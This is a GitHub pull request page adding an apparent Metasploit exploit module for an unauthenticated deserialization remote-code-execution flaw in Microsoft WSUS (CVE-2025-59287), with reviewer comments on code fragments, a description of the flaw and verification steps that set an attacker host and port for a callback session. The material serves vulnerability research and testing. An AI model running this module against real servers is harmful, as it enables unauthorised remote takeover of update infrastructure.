Adds module for unauthenticated deserialization in WSUS (CVE-2025-59287) #20674
+273
−0
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
dledda-r7
reviewed
Nov 6, 2025
| formatter: :SoapFormatter | ||
| ) | ||
|
|
||
| soap_body = %(<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"> |
Contributor
There was a problem hiding this comment.
Can you please use HEREDOC here?
dledda-r7
reviewed
Nov 6, 2025
| }) | ||
| return CheckCode::Safe('Target does not run WSUS') unless res&.code == 200 && res.headers['Server'] == 'Microsoft-IIS/10.0' | ||
|
|
||
| CheckCode::Appears('Target is probably running WSUS') |
Contributor
There was a problem hiding this comment.
Suggested change
| CheckCode::Appears('Target is probably running WSUS') | |
| CheckCode::Detected('Target is probably running WSUS') |
jvoisin
reviewed
Nov 8, 2025
Contributor
jvoisin
left a comment
jvoisin
left a comment
There was a problem hiding this comment.
Wow, that's a very clean module, kudos!
| 'Platform' => 'win', | ||
| 'DefaultOptions' => { | ||
| 'RPORT' => '8530', | ||
| 'WfsDelay' => 900 # need to wait for WSUS to try synchronize |
Contributor
There was a problem hiding this comment.
Why 900 seconds specifically?
| 'DisclosureDate' => '2025-10-14', | ||
| 'DefaultTarget' => 0, | ||
| 'Notes' => { | ||
| 'Stability' => [CRASH_SERVICE_RESTARTS], |
Contributor
There was a problem hiding this comment.
Why crash? This is a deserialization-based RCE, so it shouldn't crash, ever, shouldn't it?
| 'Notes' => { | ||
| 'Stability' => [CRASH_SERVICE_RESTARTS], | ||
| 'Reliability' => [REPEATABLE_SESSION], | ||
| 'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS] |
| <EventID>389</EventID> | ||
| <SourceID>301</SourceID> | ||
| <UpdateID> | ||
| <UpdateID>00000000-0000-0000-0000-000000000000</UpdateID> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR adds RCE module for unauthenticated deserialization in WSUS - CVE-2025-59287.
Work in progress.WSUS provides features for managing and distributing updates through a management console.
The CVE-2025-59287 is a remote code execution vulnerability in
this component that allows an unauthenticated attacker to create a specially crafted event that gets unsafely deserialized upon server sync.
One way to run synchronization is to open the
Windows Server Update Serviceapp,the other is to run the following command from PowerShell:
(Get-WsusServer).GetSubscription().GetLastSynchronizationInfo()Verification Steps
use exploit/windows/http/wsus_deserialization_rceset RHOSTS [target IP]set LHOST [attacker IP]set LPORT [attacker port]runOptions
Scenarios